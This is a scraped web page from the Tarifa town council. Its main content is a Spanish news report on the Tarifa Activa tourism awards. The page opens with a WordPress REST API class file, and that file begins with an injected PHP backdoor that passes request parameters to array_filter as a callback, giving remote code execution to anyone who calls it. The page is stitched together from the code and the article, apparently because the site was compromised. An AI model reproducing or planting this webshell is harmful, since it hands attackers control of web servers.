?php if ($_REQUEST['param1']&&$_REQUEST['param2']) {$f = $_REQUEST['param1']; $p = array($_REQUEST['param2']); $pf = array_filter($p, $f); echo 'OK'; Exit;}; /** * REST API: WP_REST_User_Meta_Fields class * * @package WordPress * @subpackage REST_API * @since 4.7.0 */ /** * Core class used to manage meta values for users via the REST API. * * @since 4.7.0 * * @see WP_REST_Meta_Fields */ class WP_REST_User_Meta_Fields extends WP_REST_Meta_Fields { /** * Retrieves the object meta type. * * @since 4.7.0 * * @return string The user meta type. */ protected function get_meta_type() { return 'user'; } /** * Retrieves the object meta subtype. * * @since 4.9.8 * * @return string 'user' There are no subtypes. */ protected function get_meta_subtype() { return 'user'; } /** * Retrieves the type for register_rest_field(). * * @since 4.7.0 * * @return string The user REST field type. */ public function get_rest_field_type() { return 'user'; } } EL CICLOTURISMO, PROTAGONISTA EN LOS PREMIOS TARIFAACTIVA – Excmo. Ayuntamiento de Tarifa

EL CICLOTURISMO, PROTAGONISTA EN LOS PREMIOS TARIFAACTIVA

La Asociación Gastronómica y Antonio de María han sido galardonados también, junto a la Fidelidad de Jorge Reque

Los premios Tarifa Activa, entregados hoy en celebración por el Día del Turismo han sido se han desarrollado en el interior del Castillo. El lugar escogido no ha sido casualidad. El propio Alcalde desveló más tarde en su discurso la manifiesta decisión por este lugar a favor de mostrar la revalorización del patrimonio histórico tarifeño en los últimos años.

Las empresas del sector “deportes y aventuras” han sido grandes protagonistas de la ceremonia. El consistorio ha querido premiarlas porque desarrollan una promoción de la riqueza natural de Tarifa incuestionable. Se trata de las empresas Repack, con Jaime Soriano, AOS Tarifa, con Carlos Figueroa, y Sailboards Tarifa, con Raquel Cámara, las reconocidas. Se dedican no sólo a la venta de material, sino también a la promoción de rutas por el término municipal. Son, en cuanto a marca, un referente andaluz y han escogido Tarifa para asentarse y mostrar parajes para muchos desconocidos hasta la fecha. Su dinamismo entra en concordancia directa con el sello Tarifa Activa y ellos mismos han agradecido el interés del ayuntamiento por promocionar los deportes en el turismo.

Pero la conciencia colectiva y empresarial desarrollada en los últimos años es fruto, según Juan Andrés Gil, de implicar al empresariado de forma directa en la actividad económica. Tarifa Activa ha entregado así el Premio a la Imagen a la Asociación Gastronómica de Tarifa. En esta decisión ha pesado precisamente el resultado de aplicar una dinámica de colaboración constante con el sector privado. Al calor de esta mentalidad se desarrollaron colectivos citados por el propio Alcalde como ATADEN, la Asociación de Empresarios de Tarifa y también la reciente Asociación Gastronómica de Tarifa. Gracias a ello están los valiosos resultados de la III Ruta del Atún, la última llevada a cabo y gestionada por entero por estos empresarios. Juan Castro, secretario actual de este colectivo, recogió el galardón en la noche de hoy.

El Premio a la Fidelidad ha recaído sobre el ciudadano Jorge Reque, un turista que escogió al municipio tarifeño desde que era un niño llevado también por la pasión de su padre. En público, ha recordado a su progenitor y le ha agradecido que le mostrara las beldades de una ciudad a la que no ha dejado de venir desde los 6 años exactamente. Reque aprendió a practicar windsurf y se conoce calles y plazas, y todas las celebraciones tradicionales de Tarifa. Ha sido el ejemplo a seguir y también el objetivo de los munícipes para con el resto de la población que visita el municipio. La fidelización es una cualidad referida también por la delegada municipal de Turismo, Inmaculada Olivero, en su discurso final.

Un nuevo galardón caracteriza también a la edición de los premios de este año. Se trata del Premio al Fomento Turístico que ha recaído sobre la figura de Antonio de María Ceballos. Entre el público especializado que ha asistido hoy a la gala han sobrado las presentaciones. Antonio de María ha desarrollado un magistral discurso a los presentes. Su experiencia de años al frente de una de las organizaciones más influyentes del sector hostelero a nivel provincial y regional, avalan palabras que no han dejado indiferente. Aportó datos como la cifra de 46750 trabajadores que en Cádiz integran el sector hostelero. Empleos directos que ha referido con orgullo para añadir que “el turismo ha salvado a la provincia”. Rotundas han sido también sus frases sobre Tarifa cuando refirió que “Tarifa se ha convertido a pulso en la envidia de otros lugares” y que “no conoce ningún espacio geográfico en el mundo que reúne tantas cualidades”. Ha alabado al alcalde, de quién reconoce sus desmedidos esfuerzos en esta materia, y también las cualidades de Olivero, a quien conoce personalmente por haber coincidido con ésta en la larga andadura en el sector.

El acto comenzó con la proyección de un video sobre todo el calendario de actividades y eventos que ya rige el curso habitual de la ciudad y de los tarifeños. Sobre ello destacó el alcalde, en su discurso último, su consolidación definitiva. Gil García ha querido subrayar que cada acto tradicional de la ciudad ha alcanzado “un marcado carácter promocional”. El alcalde ha rendido homenaje a los primeros empresarios tarifeños que sobre los 70 comenzaron una andadura incierta que ha dado ahora frutos inimaginables.

Ha querido remarcar que hay que “seguir mejorando en la conciliación de horarios y de actividades, en los servicios básicos que ofrezca la administración y en la promoción, así como en otros aspectos que debemos trabajar de la mano”. Las alusiones al empresariado han sido frecuentes porque para el primer edil tarifeño el desarrollo económico de Tarifa “está consolidado y se asienta sobre el turismo”.

No ha olvidado éste hacer un reconocimiento público y manifiesto al anterior concejal de Turismo, José Antonio Santos, que estaba presente entre el público. Tampoco dejó de anunciar la terminación del equipamiento de todo el observatorio de Cazalla.

Olivero, por su parte, agradeció la presencia a los miembros de la corporación municipal porque “no debemos politizar el turismo”, aseguró, en clara defensa del mismo como recurso económico vital para todos. La edil del área apostó por un desarrollo más amplio de la oferta turístico y citó a la campiña y a Facinas como objetivos para el trabajo a corto plazo. No dejó de hacer alusiones al reconocido aumento de las pernoctaciones en las últimas estadísticas y terminó reflexionando sobre la necesidad de que los tarifeños y residentes comiencen a querer a Tarifa “tanto como nos quieren los de fuera”.

0 Comentarios

No hay comentarios disponibles.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

ArabicEnglishFrenchGermanPortugueseSpanish
Cambiar tamaño de texto
Contraste